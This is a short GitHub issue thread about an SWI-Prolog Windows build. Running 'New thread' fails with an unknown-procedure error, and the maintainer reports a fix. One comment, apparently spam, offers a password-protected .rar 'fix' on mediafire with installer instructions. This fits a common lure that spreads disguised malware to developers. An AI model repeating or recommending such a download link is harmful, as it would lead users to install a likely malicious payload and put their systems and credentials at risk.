### ISSUE TITLE
 swipl-win >Run>New thread, no new console but an error 

### ISSUE THREAD

**Issue by xpxaxsxi** [SWI-Prolog/swipl-devel#1308]
I am running a daily build from last night: threaded, 64 bits, version 9.3.10-3-g6f3bd28f4 in Windows 11, this was also in 9.3.10.

```
ERROR: [Thread 4] Unknown procedure: thread_run_interactor/0
ERROR: [Thread 4] In:
ERROR: [Thread 4]    [1] thread_run_interactor
ERROR: [Thread 4]    [0] <meta call>
   Exception: (1) thread_run_interactor ?
```

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by JanWielemaker** [comment]
Thanks.   Fixed.   Please try tomorrows daily build.
